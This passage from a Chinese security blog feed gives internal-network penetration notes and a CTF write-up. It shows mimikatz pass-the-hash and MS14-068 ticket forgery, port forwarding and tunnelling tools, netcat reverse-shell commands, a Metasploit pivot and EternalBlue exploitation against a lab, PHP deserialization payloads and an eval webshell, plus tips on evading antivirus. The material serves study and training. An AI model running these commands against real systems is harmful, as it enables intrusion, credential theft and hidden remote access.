/ntlm:ntlm值<br></code></pre></td></tr></table></figure><p>然后在mimikatz弹回的cmd命令行中建立连接,执行命令即可。例如:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">dir</span> \\目标机器IP\c<span class="hljs-variable">$</span><br></code></pre></td></tr></table></figure><p>但是,实战中我们不知道获得的ntlm值属于哪一台主机,这就需要在弹出来的cmd命令行中进行测试。</p><p><strong>票据传递(PTT)</strong></p><p>我们在渗透测试中,要使用哈希传递攻击,则必须要获取目标机器的管理员权限。如果没有管理员权限,我们不妨用用票据传递攻击(PTT)。</p><p>在开始学习票据传递之前,我们有必要了解一下Kerberos协议:<a href="https://www.freebuf.com/articles/web/290907.html">Kerberos协议认证过程(理论篇) - FreeBuf网络安全行业门户</a></p><p>在票据传递攻击(PTT)中,我们常用的有MS14-068、黄金票据、白银票据。其中MS14-068可用来横向获取域内主机权限,黄金票据、白银票据则可以用来对域控进行权限维持。这里我们主要结合mimikatz结合exp来利用MS14-068漏洞,至于黄金票据、白银票据我们将在未来的域内权限维持中讲解。</p><p>首先获取域用户的sid:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">whoami /user<br></code></pre></td></tr></table></figure><p>用exp生成伪造的凭证(<a href="https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068">exp下载地址点这里</a>):</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">ms14<span class="hljs-literal">-068</span>.exe <span class="hljs-literal">-u</span> 域成员名<span class="hljs-selector-tag">@</span>域名 <span class="hljs-literal">-s</span> sid <span class="hljs-literal">-d</span> 域控制器地址 <span class="hljs-literal">-p</span> 域成员密码<br></code></pre></td></tr></table></figure><p>利用mimikatz清空凭证,因为有域成员凭证会影响伪造:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs powershell">mimikatz <span class="hljs-comment"># kerberos::purge #清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造</span><br>mimikatz <span class="hljs-comment"># kerberos::list #查看当前机器凭证</span><br>mimikatz <span class="hljs-comment"># kerberos::ptc 票据文件名 #将票据注入到内存中</span><br></code></pre></td></tr></table></figure><p>注入成功后,即可使用<code>net use</code>命令登录目标机器:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">net use \\目标机器IP 密码 /user:用户名<br></code></pre></td></tr></table></figure><p><strong>国产内网杀器–Ladon</strong></p><p>由于是图形化工具,所以这里不再赘述。它的功能包括信息收集、协议扫描、漏洞探针、传递攻击等,有兴趣的自行了解。</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>内网渗透</tag>
</tags>
</entry>
<entry>
<title>内网渗透(四)--通信技术</title>
<link href="/2022/01/25/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E5%9B%9B%EF%BC%89-%E9%80%9A%E4%BF%A1%E6%8A%80%E6%9C%AF/"/>
<url>/2022/01/25/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E5%9B%9B%EF%BC%89-%E9%80%9A%E4%BF%A1%E6%8A%80%E6%9C%AF/</url>
<content type="html"><![CDATA[<h2 id="主要通信技术"><a href="#主要通信技术" class="headerlink" title="主要通信技术"></a>主要通信技术</h2><p>当拿到某网络主机的权限,发现无法将流量或者权限发送出来,对渗透造成了很大的影响,所以内网渗透必须需要了解到两种主要的通信技术–<strong>代理与隧道(端口转发)技术</strong>。</p><p>代理技术解决的问题:代理简单来讲解决网络之间的通信问题,如内网与外网之间或者两者自己之间的通信,两个不同内网的通信就必须借助到代理,否则无法通讯。</p><p>隧道技术解决的问题:简单来讲就是解决流量无法发送,隧道技术多用来绕过一些安全设备的监控,如防火墙过滤问题,网络连接通讯问题,数据回链封装问题,对我们发送的流量进行了拦截,这个时候需要接触隧道技术绕过拦截,隧道技术就是使用不同的协议把走不通的路走通。走不同的协议技术建立通讯,可以说是其中也包括了一些代理的技术。</p><h2 id="代理"><a href="#代理" class="headerlink" title="代理"></a>代理</h2><h3 id="正向代理和反向代理"><a href="#正向代理和反向代理" class="headerlink" title="正向代理和反向代理"></a>正向代理和反向代理</h3><p>正向代理就是你主动请求连接服务器,反向代理就是服务器主动连接你。</p><p>正向代理的典型用途是为在防火墙内的局域网客户端提供访问Internet的途径。正向代理还可以使用缓冲特性减少网络使用率;<br>反向代理的典型用途是将防火墙后面的服务器提供给Internet用户访问。反向代理还可以为后端的多台服务器提供负载平衡,或为后端较慢的服务器提供缓冲服务。<br>另外,反向代理还可以启用高级URL策略和管理技术,从而使处于不同web服务器系统的web页面同时存在于同一个URL空间下。</p><h2 id="隧道(端口转发)"><a href="#隧道(端口转发)" class="headerlink" title="隧道(端口转发)"></a>隧道(端口转发)</h2><p>一般情况,在渗透测试后获取主机权限后下一步就是内网渗透,内网中的其他机器是不允许外网机器访问的。这时候,我们可以通过 <strong>隧道(端口转发)</strong> 或将这台<strong>外网服务器</strong>设置成为 <strong>代理</strong>,使得我们自己的攻击机可以直接访问与操作内网中的其他机器。实现这一过程的手段就叫做<strong>端口转发</strong>。</p><p>隧道技术使用在不同的OSI层进行,大体总结了以下三种:<br>网络层:IPV6隧道,ICMP隧道<br>传输层:TCP隧道,UDP隧道,常规的端口转发<br>应用层:SSH隧道,HTTP/S隧道,DNS隧道</p><p>需要注意的是,使用某种隧道之前,需要检查环境本身是否支持这种协议的使用,才能去使用响应的隧道传输。</p><h2 id="常用工具"><a href="#常用工具" class="headerlink" title="常用工具"></a>常用工具</h2><p>内网渗透中常用的代理工具有很多,例如lcx,nps,frp,venom,proxifier/proxychains+reGeorg等等。这里我就不全部讲解了。</p><p>1.LCX(Windows)/Portmap(Linux)</p><p>很有名的一款工具,杀软直接秒杀,上传到目标机器前要提前做好免杀。下载地址:<a href="https://github.com/AA8j/SecTools/tree/main/lcx">https://github.com/AA8j/SecTools/tree/main/lcx</a></p><p>下面介绍一下使用该工具的两种场景。</p><p>(1)假如此时已经拿到了边界服务器的权限,但是由于防火墙限制,进网端口被限制,但可以出网,此时就可以将边界服务器的端口转发到攻击机上,然后访问攻击机的端口。</p><p>边界服务器为Windows:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-comment"># 攻击机上执行:</span><br>./portmap <span class="hljs-literal">-m</span> <span class="hljs-number">2</span> <span class="hljs-literal">-p1</span> <span class="hljs-number">4444</span>(本机监听端口) <span class="hljs-literal">-h2</span> <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span>(转发到目的IP) <span class="hljs-literal">-p2</span> <span class="hljs-number">3389</span>(转发到目的端口)<br><span class="hljs-comment"># 表示监听本机的4444端口,并转发到127.0.0.1的3389端口。</span><br><br><span class="hljs-comment"># m的参数说明:</span><br><span class="hljs-comment"># 1.监听port1 (p1)端口并且连接主机2(h2)的port2(p2) 端口</span><br><span class="hljs-comment"># 2.监听port1(p1)和port2(p2) 端口</span><br><span class="hljs-comment"># 3.连接主机1(h1)对应的端口和主机2(h2)对应的端口</span><br><br><span class="hljs-comment"># 边界服务器上执行:</span><br>lcx.exe <span class="hljs-literal">-slave</span> <span class="hljs-number">192.168</span>.<span class="hljs-number">8.48</span>(转发到目的IP) <span class="hljs-number">4444</span>(转发到目的端口) <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span> <span class="hljs-number">3389</span>(转发的本地端口)<br><span class="hljs-comment"># 表示将本地的3389端口转发到192.168.8.48的4444端口</span><br></code></pre></td></tr></table></figure><p>边界服务器为Linux:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-comment"># 攻击机上执行</span><br>./portmap <span class="hljs-literal">-m</span> <span class="hljs-number">2</span> <span class="hljs-literal">-p1</span> <span class="hljs-number">4444</span>(本机监听端口) <span class="hljs-literal">-h2</span> <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span>(转发到目的IP) <span class="hljs-literal">-p2</span> <span class="hljs-number">222</span>(转发到目的端口)<br><span class="hljs-comment"># 表示监听本机的4444端口,并转发到127.0.0.1的222端口。</span><br><br><span class="hljs-comment"># 边界服务器上执行</span><br>./portmap <span class="hljs-literal">-m</span> <span class="hljs-number">3</span> <span class="hljs-literal">-h1</span> <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span> <span class="hljs-literal">-p1</span> <span class="hljs-number">22</span> <span class="hljs-literal">-h2</span> <span class="hljs-number">192.168</span>.<span class="hljs-number">8.48</span> <span class="hljs-literal">-p2</span> <span class="hljs-number">4444</span><br><span class="hljs-comment"># 将本地的22端口转发到192.168.8.48的4444端口</span><br></code></pre></td></tr></table></figure><p>(2)假如此时已经拿到了边界服务器的权限,但是由于防火墙策略限制导致3389端口无法出网,此时可以将此端口映射到可以出网的端口。</p><p>边界服务器为Windows: </p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-comment"># 边界服务器上执行</span><br>lcx.exe <span class="hljs-literal">-tran</span> <span class="hljs-number">53</span> <span class="hljs-number">192.168</span>.<span class="hljs-number">8.56</span>(边界服务器ip) <span class="hljs-number">3389</span><br></code></pre></td></tr></table></figure><p>此时远程桌面连接192.168.8.56的53端口即可。</p><p>边界服务器为Linux:</p><p>推荐使用ssh隧道。</p><p>可能有师傅会问,既然已经把远程端口转发到本地了,为什么还要在本地再转发一次呢?这是因为<code>-slave</code>参数和<code>-listen</code>参数必须成对出现,否则连接远程桌面会一直连不上。</p><p>2.netsh</p><p>Windows自带的一款工具,不需要上传到目标机器。值得注意的是,它不能把本地端口转发到其它机器上。</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-comment"># 把任意机器的指定端口转发到本地</span><br>netsh interface portproxy add v4tov4 listenaddress=<span class="hljs-number">0.0</span>.<span class="hljs-number">0.0</span> listenport=目标机端口 connectaddress=<span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span> connectport=本机端口 protocol=tcp <span class="hljs-comment"># 添加转发策略</span><br>netsh interface portproxy delete v4tov4 listenport=目标机端口 listenaddress=目标机ip <span class="hljs-comment"># 删除转发策略</span><br></code></pre></td></tr></table></figure><p>3.reGeorg</p><p>reGeorg是一款把内网服务器端口的数据通过http/https隧道转发到本机,实现基于HTTP通信的工具。使用时需要配合webshell建立一个socks5代理来进行内网穿透,支持多种类型的webshell。因为使用频繁,所以较多的杀软都会拦截,需要做免杀处理。</p><p>免杀版本下载:<a href="https://github.com/L-codes/Neo-reGeorg">GitHub - L-codes/Neo-reGeorg: Neo-reGeorg is a project that seeks to aggressively refactor reGeorg</a></p><p>在<strong>边界服务器</strong>上传webshell后,浏览器访问边界服务器webshell所在地址,如果出现提示:<code>Georg says,'All seems fine'</code>,则说明连接建立成功。</p><p>不过这款工具一般搭配proxifier或者proxychains使用。启用上面的脚本后,命令行会显示转发到本地的端口,这时再搭配proxifier或者proxychains使用就可以了。</p><p>4.netcat(nc)</p><p>这款工具太有名了,被称为“网络界的瑞士军刀”。除了用来端口转发以外,还能用来传输文件、端口扫描,不过这里我们不作讲解,有兴趣的自行研究进阶用法。</p><p>常用命令行参数:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-literal">-l</span> 开启监听状态<br><span class="hljs-literal">-v</span> 显示详细信息<br><span class="hljs-literal">-p</span> 指定监听的本地端口<br><span class="hljs-literal">-k</span> 客户端断掉连接时,服务端依然保持运行<br><span class="hljs-literal">-e</span> 将传入的信息以命令执行<br><span class="hljs-literal">-n</span> 直接使用 IP 地址,不进行 dns 解析过程<br></code></pre></td></tr></table></figure><p>一般用作反弹shell,正向连接很少用。在公网vps上监听:</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-comment"># Linux主机</span><br>nc <span class="hljs-literal">-lvnp</span> 本机端口 <span class="hljs-literal">-e</span> /bin/bash<br>nc <span class="hljs-literal">-lvnp</span> 本机端口 <span class="hljs-literal">-c</span> bash<br><span class="hljs-comment"># Windows主机</span><br>nc <span class="hljs-literal">-lvnp</span> 本机端口 <span class="hljs-literal">-e</span> C:\Windows\System32\cmd.exe<br>nc <span class="hljs-literal">-lvnp</span> 本机端口 <span class="hljs-literal">-c</span> cmd<br></code></pre></td></tr></table></figure><p>目标机则可以利用各种方式进行主动连接,例如bash反弹一句话、Python、PHP等。推荐给大家一个谷歌浏览器插件–Hack-Tools,里面可以生成各种正向连接命令,再也不用担心命令记不住了!</p><p>5.venom</p><p>参考文章:<a href="https://blog.csdn.net/weixin_45859850/article/details/119813079">Venom工具的使用(内网渗透 多级代理)_rang#的博客-CSDN博客_venom工具</a></p><p>6.nps、frp</p><p>由于官方文档很详细,所以这里不再讲解。</p><p>还有一些极端情况,比如目标内网防火墙禁用了http协议,那么只能采用dns隧道、icmp隧道、ssh隧道了。由于篇幅有限,这里不再讲解,需要时搜索对应工具即可。</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>内网渗透</tag>
</tags>
</entry>
<entry>
<title>内网渗透(三)--多层内网</title>
<link href="/2022/01/17/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%89%EF%BC%89-%E5%A4%9A%E5%B1%82%E5%86%85%E7%BD%91/"/>
<url>/2022/01/17/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%89%EF%BC%89-%E5%A4%9A%E5%B1%82%E5%86%85%E7%BD%91/</url>
<content type="html"><![CDATA[<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p>渗透靶机:Kali Linux 2021.3</p><p>第一层靶机 (外网web服务器): CentOS 7</p><p>第二层靶机 (内网web服务器): Ubuntu 18.04</p><p>第三层靶机 (内网办公机) : Windows 7</p><blockquote><p>除渗透靶机外,每台靶机均安装宝塔面板且防火墙均关闭。</p><p>为了模拟外网攻击,渗透靶机的网络设置可以不用改变。</p></blockquote><h2 id="内网配置"><a href="#内网配置" class="headerlink" title="内网配置"></a>内网配置</h2><p>这里我们在“设置”–“虚拟网络编辑器”里面添加VMnet14和15两个网络适配器,均设置为“仅主机模式”。再把VMnet14的子网地址设置为192.168.22.0,把VMnet15的子网地址设置为192.168.33.0。</p><p>把CentOS 7的网卡1设置为桥接模式,网卡2设置为自定义(VMnet14);把Ubuntu的网卡1设置为VMnet14,网卡2设置为VMnet15;把Windows 7的网卡设置为VMnet15。</p><p>完成配置后,正式开始渗透。</p><h2 id="渗透步骤"><a href="#渗透步骤" class="headerlink" title="渗透步骤"></a>渗透步骤</h2><p>先在kali攻击机上用msf生成一个Linux木马。由于第一层靶机使用了thinkPHP的框架,所以直接上exp,写入一句话木马,再用蚁剑连接。但是,宝塔面板的waf会过滤掉“post”,所以我们把一句话木马进行base64编码后再上传即可。连接上以后,上传msf生成的Linux木马,设置监听(方法在前面的笔记里面有)。</p><h3 id="msf查看网卡情况"><a href="#msf查看网卡情况" class="headerlink" title="msf查看网卡情况"></a>msf查看网卡情况</h3><p>首先输入<code>arp -a</code>查看该机器上的网卡信息。</p><p>获取网络架构分布:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">run get_local_subnets<br></code></pre></td></tr></table></figure><p>添加路由访问:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">run autoroute -s 192.168.22.0/24或run post/multi/manage/autoroute<br></code></pre></td></tr></table></figure><p>那为什么要添加路由呢?因为后面我们要进行主机端口扫描的时候,是需要退出当前meterpreter的。而退出了当前会话我们就不能访问内网主机了那我们就不能进行端口扫描。所以需要添加路由,那我们退出了meterpreter也能进行端口扫描(不管有没有添加路由都ping不通)</p><p>查看路由表信息(检查路由是否添加成功):</p><figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs arduino">run autoroute -p或route print<br></code></pre></td></tr></table></figure><p>完成之后用<code>background</code>挂起会话,再使用socks4代理:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">use auxiliary/server/socks_proxy<br><span class="hljs-built_in">set</span> VERSION 4a<br><span class="hljs-built_in">set</span> SRVHOST 192.168.50.xx <span class="hljs-comment">#我的网关ip为192.168.50.1,这里填kali攻击机的ip</span><br>exploit<br></code></pre></td></tr></table></figure><h3 id="使用proxychains代理工具"><a href="#使用proxychains代理工具" class="headerlink" title="使用proxychains代理工具"></a>使用proxychains代理工具</h3><p>配置proxychains代理文件:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">vim /etc/proxychains4.conf<br></code></pre></td></tr></table></figure><p>在最后一行添加:<code>socks4 192.168.50.xx 1080</code>并保存退出(这里的ip也是填kali的),再输入<code>session1</code>返回刚才的会话。</p><p>用nmap扫描第二层靶机:</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">proxychains</span> nmap -Pn -sT <span class="hljs-number">192</span>.<span class="hljs-number">168</span>.<span class="hljs-number">22</span>.xx<br></code></pre></td></tr></table></figure><p>当然你也可以选择本机挂代理访问,把kali攻击机作为代理服务器,socks4代理推荐用SocksCap64这款软件。</p><p>用与前面同样的方法让第二层靶机上线,<code>arp -a</code>查看该机器上的网卡信息,配置路由,nmap扫描后发现第三层靶机开启了445端口,上网查询后发现存在“永恒之蓝”漏洞,于是直接使用msf内置的exp模块:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">use exploit/windows/smb/ms17_010_psexec<br><span class="hljs-built_in">set</span> payload windows/meterpreter/bind_tcp<br><span class="hljs-built_in">set</span> rhost 192.168.33.xx<br>exploit<br></code></pre></td></tr></table></figure><p>为了隐藏shell进程,我们可以进行进程迁移:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">getpid<br>run post/windows/manage/migrate<br></code></pre></td></tr></table></figure><p>输入<code>shell</code>即可执行Windows添加用户的命令(如果shell中出现乱码,输入命令<code>chcp 65001</code>即可),退出shell后配置端口转发,把内网的3389端口转发到kali本地的1111端口:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">portfwd add -l 1111 -p 3389 -r 192.168.33.xx<br></code></pre></td></tr></table></figure><p>启动远程桌面:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">rdesktop -u 用户名 -p 密码 192.168.50.xx:1111 <span class="hljs-comment">#ip同样是kali的</span><br></code></pre></td></tr></table></figure><p>渗透结束,收工,接下来我们就可以操控第三层靶机愉快地玩耍了!</p><h2 id="踩过的坑"><a href="#踩过的坑" class="headerlink" title="踩过的坑"></a>踩过的坑</h2><p>在配置第一层靶机的thinkPHP环境时,首先输入<code>bt default</code>查看宝塔面板安全入口,再登录进去。<strong>这里注意了,显示的公网ip是不能用来直接登录的,我们要使用家里局域网的ip登录。</strong>登录进去以后把域名改为第一层靶机的两个网卡对应的ip,然后把根目录设为<code>/www/wwwroot/ThinkPHP</code>。<strong>第二个坑来了:这里还要配置thinkPHP的伪静态规则,并且把启动目录设为<code>/public</code>(已知thinkPHP版本为5)。</strong></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>上面的笔记看似内容不多且简单,其实需要很长时间消化,本人在复现的过程中也遇到了重重困难。内网渗透的学习绝非易事,让我们一起加油,攻克内网渗透这个大难关!</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>内网渗透</tag>
</tags>
</entry>
<entry>
<title>WUSTCTF2021官方Write-up</title>
<link href="/2021/12/11/WUSTCTF2021%E5%AE%98%E6%96%B9Write-up/"/>
<url>/2021/12/11/WUSTCTF2021%E5%AE%98%E6%96%B9Write-up/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>这场比赛没有AWD,只有线下解题赛,还是在校内举行的,历时8个小时,仅限本校学生参加哦!</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><h3 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h3><h4 id="寻宝"><a href="#寻宝" class="headerlink" title="寻宝"></a>寻宝</h4><p>根据提示,访问<code>robots.txt</code> ;访问给出的博客,根据提示 <code>old!old!old! </code>,推测和时间有关,从后往前找线索,在最后(发布时间最早)的博客<a href="https://unbelievable.cool/1898/11/23/old_blog/">old_blog</a>里发现线索;根据新线索访问 <code>/get_final_treasure.php</code>。</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-title function_ invoke__">header</span>(<span class="hljs-string">"Content-Type:text/html;charset=utf-8"</span>);<br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-keyword">include</span> <span class="hljs-string">"flag_3.php"</span>; <span class="hljs-comment">// "最后的宝藏在flag_3.php的$flag里你能发现他么?";</span><br><span class="hljs-variable">$hello</span> = <span class="hljs-string">"world"</span>;<br><span class="hljs-variable">$world</span> = <span class="hljs-string">"hello"</span>;<br><span class="hljs-keyword">if</span> ( !<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">"flag"</span>]) )<br><span class="hljs-keyword">die</span>(<span class="hljs-variable">$hello</span>);<br><span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$_GET</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$key</span> => <span class="hljs-variable">$value</span>)<br><span class="hljs-variable">$$key</span> = <span class="hljs-variable">$$value</span>;<br><span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$_POST</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$key</span> => <span class="hljs-variable">$value</span>)<br><span class="hljs-variable">$$key</span> = <span class="hljs-variable">$value</span>;<br><span class="hljs-keyword">if</span> ( <span class="hljs-variable">$_POST</span>[<span class="hljs-string">"flag"</span>] !== <span class="hljs-variable">$flag</span> )<br><span class="hljs-keyword">die</span>(<span class="hljs-variable">$hello</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-string">"give_you_flag!: "</span>. <span class="hljs-variable">$flag</span> . <span class="hljs-string">"\n"</span>;<br><span class="hljs-keyword">die</span>(<span class="hljs-variable">$world</span>);<br><span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>简单的可变变量,我使用的是<code>$world</code>,题目给的<code>echo "give_you_flag!: ". $flag . "\n";</code> 用不了。payload:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">GET:world=flag<br>POST:flag=<span class="hljs-number">1</span><br></code></pre></td></tr></table></figure><p><code>$world</code>在<code>$flag</code>值变化前接受了其值,所以不会受到影响。拼接三部分的flag,提交。</p><h4 id="Ezserialize"><a href="#Ezserialize" class="headerlink" title="Ezserialize"></a>Ezserialize</h4><p>字符型反序列化,减少还是增加都可以,我选择的是字符增加型(字符减少型是最简单的),计算涉及的字符数为79,下方是编码后的待逃逸:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">%<span class="hljs-number">22</span>%<span class="hljs-number">3</span>Bs%<span class="hljs-number">3</span>A10%<span class="hljs-number">3</span>A%<span class="hljs-number">22</span>%<span class="hljs-number">00</span>%<span class="hljs-number">2</span>A%<span class="hljs-number">00</span>vertify%<span class="hljs-number">22</span>%<span class="hljs-number">3</span>BO%<span class="hljs-number">3</span>A5%<span class="hljs-number">3</span>A%<span class="hljs-number">22</span>admin%<span class="hljs-number">22</span>%<span class="hljs-number">3</span>A1%<span class="hljs-number">3</span>A%<span class="hljs-number">7</span>Bs%<span class="hljs-number">3</span>A7%<span class="hljs-number">3</span>A%<span class="hljs-number">22</span><br>%<span class="hljs-number">00</span>%<span class="hljs-number">2</span>A%<span class="hljs-number">00</span>flag%<span class="hljs-number">22</span>%<span class="hljs-number">3</span>Bs%<span class="hljs-number">3</span>A20%<span class="hljs-number">3</span>A%<span class="hljs-number">22</span>flag%<span class="hljs-number">7</span>BThis_fake_flag%<span class="hljs-number">7</span>D%<span class="hljs-number">22</span>%<span class="hljs-number">3</span>B%<span class="hljs-number">7</span>D%<span class="hljs-number">7</span>D<br></code></pre></td></tr></table></figure><p>用flag和union来完成逃逸,前者为2,后者为1:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php">POST:<br>username=aaa&password=aflagflagflagflagflagflagflagflagflagflagflagflagflagflagf<br>lagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagf<br>lagflagflagflagflagunion%<span class="hljs-number">22</span>%<span class="hljs-number">3</span>Bs%<span class="hljs-number">3</span>A10%<span class="hljs-number">3</span>A%<span class="hljs-number">22</span>%<span class="hljs-number">00</span>%<span class="hljs-number">2</span>A%<span class="hljs-number">00</span>vertify%<span class="hljs-number">22</span>%<span class="hljs-number">3</span>BO%<span class="hljs-number">3</span>A5%<span class="hljs-number">3</span>A%<span class="hljs-number">22</span>admin<br>%<span class="hljs-number">22</span>%<span class="hljs-number">3</span>A1%<span class="hljs-number">3</span>A%<span class="hljs-number">7</span>Bs%<span class="hljs-number">3</span>A7%<span class="hljs-number">3</span>A%<span class="hljs-number">22</span>%<span class="hljs-number">00</span>%<span class="hljs-number">2</span>A%<span class="hljs-number">00</span>flag%<span class="hljs-number">22</span>%<span class="hljs-number">3</span>Bs%<span class="hljs-number">3</span>A20%<span class="hljs-number">3</span>A%<span class="hljs-number">22</span>flag%<span class="hljs-number">7</span>BThis_fake_flag%<span class="hljs-number">7</span>D%<br><span class="hljs-number">22</span>%<span class="hljs-number">3</span>B%<span class="hljs-number">7</span>D%<span class="hljs-number">7</span>D<br></code></pre></td></tr></table></figure><p>发送请求后拿到flag。</p><h4 id="hacker’s-gift"><a href="#hacker’s-gift" class="headerlink" title="hacker’s gift"></a>hacker’s gift</h4><p>这个题目我用了一个提示,不得不说,看提示让我想爆打出题人,“找后台打弱口令”…… 访问<code>/admin</code>自动跳转到后台登录页面,手动爆破,经过漫长而痛苦的测试,找到弱口令。(鬼知道我经历了什么,还好<code>admin666</code>这样的弱口令曾经折磨过我)payload:</p><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs abnf"><span class="hljs-attribute">username</span><span class="hljs-operator">=</span>admin<br><span class="hljs-attribute">password</span><span class="hljs-operator">=</span>admin888<br></code></pre></td></tr></table></figure><p>进入后台,根据题目名称,有礼物;这里通过备份数据库文件 getshell的方法。因为没有开启 x13 插件而行不通,差点就冲动花100元给服务器买这个插件了;在后台的网站安全项里有检测木马功能,检测一遍,发现后门文件<code>media/door.php</code>;文件内容有近似于无的混淆,跟着过程走,把最后的代码拼出来,大概是<code><?php @eval($_POST['wen']);?></code>。</p><p>链接木马,到根目录取得flag。</p><h4 id="Writeshell"><a href="#Writeshell" class="headerlink" title="Writeshell"></a>Writeshell</h4><p>题目的源代码是:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 